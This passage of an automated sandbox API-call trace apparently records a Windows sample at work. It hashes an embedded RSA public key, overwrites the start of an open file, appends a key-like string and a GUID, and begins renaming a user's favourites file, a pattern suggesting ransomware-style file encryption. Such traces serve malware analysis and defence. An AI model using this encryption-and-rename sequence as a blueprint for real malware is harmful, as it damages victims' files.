hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0193.513] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.513] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x85, lpOverlapped=0x0) returned 1 [0193.513] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0193.513] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.513] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.524] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0193.527] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0193.527] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.527] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0193.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0193.527] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0193.552] GetLastError () returned 0x0 [0193.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0193.575] GetLastError () returned 0x0 [0193.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0193.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0193.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0193.575] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0193.575] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0193.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0193.586] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0193.586] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0193.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0193.587] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0193.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0193.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0193.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x3b48b8 [0193.599] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0193.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0193.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0193.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0193.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3ed0 [0193.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62c0 [0193.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3f18 [0193.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62d8 [0193.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6308 [0193.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6368 [0193.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6320 [0193.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0193.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0193.734] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0193.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0193.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6308 | out: hHeap=0x2c0000) returned 1 [0193.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6320 | out: hHeap=0x2c0000) returned 1 [0193.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6368 | out: hHeap=0x2c0000) returned 1 [0193.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0193.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6368 [0193.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0193.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6320 [0193.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0193.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6308 [0193.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0193.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0193.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0193.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0193.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0193.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0193.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0193.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0193.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6320 | out: hHeap=0x2c0000) returned 1 [0193.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0193.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6308 | out: hHeap=0x2c0000) returned 1 [0193.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0193.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0193.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6368 | out: hHeap=0x2c0000) returned 1 [0194.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0194.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0194.024] GetCurrentThreadId () returned 0x5d8 [0194.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0194.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7ba8 [0194.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0194.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0194.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0194.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0194.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0194.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0194.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.118] GetCurrentThreadId () returned 0x5d8 [0194.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0194.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0194.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0194.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0194.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0194.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0194.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0194.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6368 [0194.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0194.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0194.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0194.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0194.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0194.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0194.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0194.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0194.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6308 [0194.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0194.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0194.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0194.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0194.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0194.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0194.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0194.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6320 [0194.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0194.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0194.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0194.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62f0 [0194.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0194.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6380 [0194.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0194.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0194.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0194.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6350 [0194.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0194.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6338 [0194.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0194.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6398 [0194.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6338 | out: hHeap=0x2c0000) returned 1 [0194.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6338 [0194.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6350 | out: hHeap=0x2c0000) returned 1 [0194.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0194.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0194.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0194.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0194.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0194.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6308 | out: hHeap=0x2c0000) returned 1 [0194.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6308 [0194.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0194.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0194.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6368 | out: hHeap=0x2c0000) returned 1 [0194.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0194.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6398 | out: hHeap=0x2c0000) returned 1 [0194.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0194.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0194.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0194.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0194.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6308 | out: hHeap=0x2c0000) returned 1 [0194.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0194.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0194.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0194.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0194.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0194.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0194.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0194.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0194.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0194.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0194.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0194.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6338 | out: hHeap=0x2c0000) returned 1 [0194.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0194.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6380 | out: hHeap=0x2c0000) returned 1 [0194.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0194.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6320 | out: hHeap=0x2c0000) returned 1 [0194.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62f0 | out: hHeap=0x2c0000) returned 1 [0194.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0194.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0194.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0194.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62d8 | out: hHeap=0x2c0000) returned 1 [0194.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f18 | out: hHeap=0x2c0000) returned 1 [0194.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0194.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0194.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0194.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0194.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0194.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0194.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0194.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0194.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0194.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0194.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0194.408] WriteFile (in: hFile=0x584, lpBuffer=0x3b48b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b48b8*, lpNumberOfBytesWritten=0x2f9fb14*=0x80, lpOverlapped=0x0) returned 1 [0194.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b48b8 | out: hHeap=0x2c0000) returned 1 [0194.409] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.409] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0194.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0194.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0194.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0194.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.423] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.424] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.424] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.424] CloseHandle (hObject=0x584) returned 1 [0194.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0194.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0194.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0194.430] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Money.url" (normalized: 